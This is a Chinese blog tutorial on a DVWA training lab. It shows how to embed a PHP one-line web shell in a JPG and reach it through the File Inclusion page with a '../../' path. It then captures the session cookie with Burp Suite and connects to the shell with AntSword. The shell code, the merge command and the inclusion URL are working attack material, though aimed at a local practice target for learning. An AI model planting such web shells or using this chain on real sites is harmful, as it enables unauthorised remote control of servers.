如何使用BrupSuit、中国蚁剑巧妙登陆DVWA查看文件

首先在自己新建一个实训文件夹下放一张储存很小的照片,

在创建一个shell.php的后门文件内容为:

<?php eval($_POST["cmd"]); ?>

<?php eval($_GET["cmd"]); ?>

<?php eval($_POST["cmd"]); ?>

然后在url中清空后输入cmd,

打开cmd.exe;输入copy motuo.jpg/b+shell.php mnv.jpg

将图片和shell.php文件一起生成二进制的图片文本格式。

然后用记事本格式打开发现一句话木马在最后,

打开dvwa的网页登陆安全级别改到low

上传小于100000KBjpg的图片

然后File inclusion。打开file1.php

修改成 http://127.0.0.1/shixun/DVWA-master/vulnerabilities/fi/?page=../../hackable/uploads/mnv.jpg

打开火狐进行拦截,打开brupsuit进行拦截

拦截后的页面如下。复制cookie的一行

打开蚁剑进行连接,在基础信息中复制http://192.168.224.6/shixun/DVWA-master/vulnerabilities/fi/?page=../../hackable/uploads/mnv.jpg URL地址

连接密码是cmd 

然后再请求信息中的name中复制Cookie;在Vlaue中复制security=low; PHPSESSID=3ps4ejpns1q2k8f8710rterrs4;在进行来连接。

点击测试连接,连接成功,再次点击添加

双击打开按以下步骤进行操作

  • 18
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安云生

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值